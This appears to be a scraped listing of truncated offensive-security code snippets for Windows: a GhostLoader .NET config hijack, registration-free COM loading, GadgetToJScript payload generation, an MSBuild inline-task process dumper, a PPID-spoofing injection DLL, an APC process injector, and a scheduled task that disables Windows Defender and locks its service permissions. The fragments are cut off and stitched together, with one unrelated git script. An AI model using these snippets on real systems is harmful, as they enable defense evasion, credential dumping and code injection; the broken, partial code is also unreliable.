GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same directory as the executable
5. Execute C:\Tools\FileHistory.exe
# Defender note: as the original author observes, the loader honors the manifest's <file> entry
# as written and does not require a conformant COM server; the unexpected image load that results
# from the CreateObject call below is the observable event (confirm coverage in your own telemetry).
# Reference test case:
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179
$manifestXml = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>'
# Build an activation context from the inline manifest text, then resolve the progid it declares.
$actCtx = New-Object -ComObject 'Microsoft.Windows.ActCtx'
$actCtx.ManifestText = $manifestXml
$comObject = $actCtx.CreateObject('JustMakeSomethingUp')
| # Command to generate HTA code using GadgetsToJScript | |
| GadgetToJScript.exe -w hta | |
| # Command to generate JS code using GadgetsToJScript | |
| GadgetToJScript.exe -w js | |
| # Command to generate VBS code using GadgetsToJScript | |
| GadgetToJScript.exe -w vbs | |
| # Command to generate VBA code using GadgetsToJScript |
| Param([parameter(Mandatory=$true, | |
| HelpMessage="Directory to search for .NET Assemblies in.")] | |
| $Directory, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to search recursively.")] | |
| [switch]$Recurse = $false, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to include DLLs in the search.")] | |
| [switch]$DLLs = $false, | |
| [parameter(Mandatory=$false, |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj --> | |
| <!-- Feel free to use a more aggressive class for testing. --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same directory as the executable
5. Execute C:\Tools\FileHistory.exe
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
| #!/bin/bash | |
| # store the current dir | |
| CUR_DIR=$(pwd) | |
| # Let the person running the script know what's going on. | |
| echo "\n\033[1mPulling in latest changes for all repositories...\033[0m\n" | |
| # Find all git repositories and update it to the master latest revision | |
| for i in $(find . -name ".git" | cut -c 3-); do |
| public class RC4 { | |
| public static byte[] Encrypt(byte[] pwd, byte[] data) { | |
| int a, i, j, k, tmp; | |
| int[] key, box; | |
| byte[] cipher; | |
| key = new int[256]; | |
| box = new int[256]; | |
| cipher = new byte[data.Length]; |
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| #include <TlHelp32.h> | |
| int PpidInject() | |
| { | |
| HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
| PROCESSENTRY32 process = { 0 }; | |
| process.dwSize = sizeof(process); |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |